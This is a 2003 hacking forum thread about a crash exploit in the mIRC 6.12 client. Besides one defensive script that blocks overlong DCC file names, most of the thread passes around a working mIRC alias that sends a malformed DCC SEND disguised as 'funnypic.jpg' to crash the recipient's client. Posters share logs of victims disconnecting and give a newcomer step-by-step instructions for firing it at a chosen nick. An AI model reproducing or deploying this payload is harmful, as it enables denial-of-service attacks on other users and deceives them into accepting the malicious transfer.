hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Mirc 6.12
Fisker
I heard that theres a new 6.12 exploit ?

fix for it is ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) { echo 4 -s $nick tried to crash you with an illegal dcc send of $nopath($filename) | halt }

so i guess if u dcc send something with over 225 letters or something, without path it crashes, but i dunno...

EDIT:
QUOTE (mrfloppy)

alias bug { raw PRIVMSG $$1 $+(:,$chr(1),DCC) send funnypic.jpg $+ $str($chr(160) $+ $chr(256),250) $+ 0 $+ .txt 2130706434 $+(8192,$chr(1)) }

this one work well make dcc get look like they getting funnypic.jpg lol


thx to mrfloppy =)
d0whc3r
It doesn't work sad.gif
SlashZero
[18:21:12] DCC Send from slash`` rejected (0123456789012345678901234567890123456789012345678901234567890123456789012345678
90123456789012345678901234567890123456789012345678901234567890123456789012345678
90123456789012345678901234567890123456789012345678901234567890123456789012345678
9012345678901234, file type ignored)
mrfloppy
well this bug only crashes mirc 6.12 if victim minimize dcc get window and trys un-minimize it same thing will happen if user has auto-minimize enabled ph34r.gif

alias bug { raw PRIVMSG $$1 $+(:,$chr(1),DCC) send funnypic.jpg $+ $str($chr(160) $+ $chr(256),250) $+ 0 $+ .txt 2130706434 $+(8192,$chr(1)) }

this one work well make dcc get look like they getting funnypic.jpg lol
relax
well this works!
QUOTE

[19:13] -> Server: PRIVMSG InterNut :DCC send funnypic. jpg                                                                             
                                                                                
                                                                                
             0.txt 2130706434 8192
[19:13] -> [InterNut] PING
[19:13] [InterNut PING reply]: 1sec
[19:13] * InterNut (internut@not.a.player.just.likes.to.(filtered).a.lot) Quit (Connection reset by peer)


weird tho, they it took a sec and they still had a ping
NoBody122
QUOTE (relax @ Oct 21 2003, 06:15 PM)
well this works!
QUOTE

[19:13] -> Server: PRIVMSG InterNut :DCC send funnypic.jpg                                                                                                                                                                                                                                                          0.txt 2130706434 8192
[19:13] -> [InterNut] PING
[19:13] [InterNut PING reply]: 1sec
[19:13] * InterNut (internut@not.a.player.just.likes.to.(filtered).a.lot) Quit (Connection reset by peer)


weird tho, they it took a sec and they still had a ping

that's because it doesn't crash until the user is trying to maximize it...
Digian
I get the feeling more people than u realise are susceptible to this .. hehe

Works however lame, I get the feeling there are more mIRC sploits to come.
thorel
Looks like finding mIRC exploits is a sports nowadays cool.gif
zyr
so again mirc problems, it worked well on myself, it too about a sec or so and then crashed mirc, only yeah, you have to accept it...
liquidSilver
Hmm, it works. LotsaŽ mIRC exploit is coming up i see.. hehe.. smile.gif

z3d
well im new to mirc scripting usage so how does one use this? Does it go in the remote section ? And how is it trigered?

/bug [Usertocrashnick] ?
badpig
umm it's work
but i think not work for Conference room
Fisker
QUOTE (z3d @ Oct 23 2003, 01:35 PM)
well im new to mirc scripting usage so how does one use this? Does it go in the remote section ? And how is it trigered?

/bug [Usertocrashnick] ?

ok u do /alias bug { raw PRIVMSG $$1 $+(:,$chr(1),DCC) send funnypic.jpg $+ $str($chr(160) $+ $chr(256),250) $+ 0 $+ .txt 2130706434 $+(8192,$chr(1)) }

in mIRC then u just do /bug nick....
misk
ITS NOT WORKING sad.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.